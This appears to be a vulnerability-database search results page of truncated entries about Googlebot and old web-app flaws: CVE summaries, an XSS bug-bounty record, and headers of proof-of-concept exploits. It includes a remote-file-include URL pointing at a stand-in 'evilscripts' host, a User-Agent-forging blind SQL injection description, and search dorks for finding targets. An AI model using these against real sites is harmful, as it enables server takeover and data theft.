22 matches found
EUVD-2023-42295
Malicious code in bioql PyPI...
CVE-2023-38479
Missing Authorization vulnerability in codents Simple Googlebot Visit simple-googlebot-visit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple Googlebot Visit: from n/a through <= 1.2.4...
CVE-2023-38479
Missing Authorization vulnerability in Codents Simple Googlebot Visit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple Googlebot Visit: from n/a through 1.2.4...
CVE-2023-38479 WordPress Simple Googlebot Visit plugin <= 1.2.4 - Broken Access Control vulnerability
Missing Authorization vulnerability in Codents Simple Googlebot Visit allows Exploiting Incorrectly Configured Access Control Security Levels. This issue affects Simple Googlebot Visit: from n/a through 1.2.4...
CVE-2023-38479
CVE-2023-38479 affects WordPress Simple Googlebot Visit plugin (
WordPress Simple Googlebot Visit Plugin <= 1.2.4 is vulnerable to Broken Access Control
Software: Simple Googlebot Visit; Type: Plugin; Vulnerable versions: <= 1.2.4; Fixed in: 1.2.5; OWASP Top 10: A5: Broken Access Control; Classification: Broken Access Control; CVE: CVE-2023-38479; Patch priority: Low; CVSS severity: Low (5.3); Developer: Claim ownership; PSID: ecc096b71d07; Credits: Abdi Pranata; Required...
Yelp: Robots.txt file with potentially sensitive content.
Vulnerability description not provided...
Shocking: Hackers using Googlebots in cryptomining malware attacks
By Waqas. Hackers are abusing Googlebot servers to deliver malicious payloads. Last year, HackRead exclusively reported on how hackers were using Google Adwords and Google Sites to spread malware. Then came another shocking research from Cisco Talos exposing how hackers exploited Google Search...
api-jobsearch.livecareer.com XSS vulnerability
Open Bug Bounty ID: OBB-385767

Description| Value
---|---
Affected Website:| api-jobsearch.livecareer.com
Open Bug Bounty Program:| Create your bounty program now. It's open and free.
Vulnerable Application:| Custom Code
Vulnerability Type:| XSS Cross Site Scripting / CWE-79
CVSSv3 Score:| 6.1...
Web Crawler Access Detection - Googlebot
Binary data 9181.prm...
DreamAccount <= 3.1 (auth.api.php) Remote File Include Exploit
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import Output, POCBase from pocsuite.utils import register class TestPOCPOCBase: vulID = '63672' ssvid version = '1.0' author = '皮皮' vulDate = '2006-12-01' createDate = '2015-12-24...
SAPID Shop <= 1.2 (root_path) Remote File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63795' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-09' createDate = '2015-12-24...
Minerva <= 2.0.21 build 238a (phpbb_root_path) File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '64022' ssvid version = '1.0' author = '皮皮' vulDate = '2006-09-28' createDate = '2015-12-24...
mambo com_babackup Component <= 1.1 File Include Vulnerability
No description provided by source. !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from pocsuite.utils import register class TestPOCPOCBase: vulID = '63864' ssvid version = '1.0' author = '皮皮' vulDate = '2006-08-22' createDate = '2015-12-24...
RedBlog 0.5 Index.PHP Remote File Include Vulnerability
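RedBlog 0.5 Index.PHP remote file inclusion vulnerability. Vulnerability type: input validation error. Impact: an attacker can exploit this vulnerability to execute a remote PHP file, thereby attacking RedBlog or even taking control of the server. exp: http://www.example.com/Path/index.php?rootpath==http://evilscripts? Solution: the vendor has not provided a patch; using Jiasule (加速乐) is recommended: !/usr/bin/env python coding: utf-8 from pocsuite.net import req from pocsuite.poc import POCBase, Output from...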
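Cmseasy blind SQL injection vulnerability in one location (bypasses 360 protection)
Brief description: Injection.. but nothing is echoed back, so it is blind.. Details: index.php line 84, stats::getbot; because no filtering of any kind was applied to $SERVER during initialization, this leads to the injection. stats.php lines 13 to 78, getbot: this feature records spider visits. $SERVER is not filtered; we only need to forge HTTPUSERAGENT as a spider's and that's it. public static function getbot $ServerName = $SERVER"SERVERNAME"; $ServerPort = $SERVER"SERVERPORT"; $ScriptName =...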
URL Spoofing vulnerability in GoogleBot, Yahoo! Slurp, Mozilla and Internet Explorer
Hello 3APA3A! I want to warn you about a URL Spoofing vulnerability in GoogleBot, Yahoo! Slurp, Mozilla and Internet Explorer. While I often find vulnerabilities in browsers, this is the first time I have found a vulnerability in a search engine's bot (spider). Bots of other search engines also can be...
Joomla! Component d3000 1.0.0 - SQL Injection
Powered by Download 3000 AUTHOR : S@BUN HOME : http://www.milw0rm.com/author/1334 BLOG : http://my.opera.com/SQL-Injection/blog/ MAiL : [email protected] DORK 1 : "Powered by Download 3000" DORK 2 : allinurl: "comd3000" EXPLOiT :...
si2007-sql.txt
Homepage: http://devilteam.eu/ 126 $result.=" ."; else $result.=" ".$string$i; if strlendechexord$string$i==2 $exa.=" ".dechexord$string$i; else $exa.=" 0".dechexord$string$i; $cont++;if $cont==15 $cont=0; $result.="\r\n"; $exa...
Xpression News 1.0.1 - archives.php Remote File Disclosure
Xpression News 1.0.1 - archives.php Remote File Disclosure r0ut3r Presents... Another r0ut3r discovery! writ3r at gmail.com XNews Remote File Disclosure Exploit Software: Xnews 1.0.1 Vendor: http://xpression.hogsmeade-village.com/ Released: 2007/01/28 Discovered & Exploit By: r0ut3r writ3r at...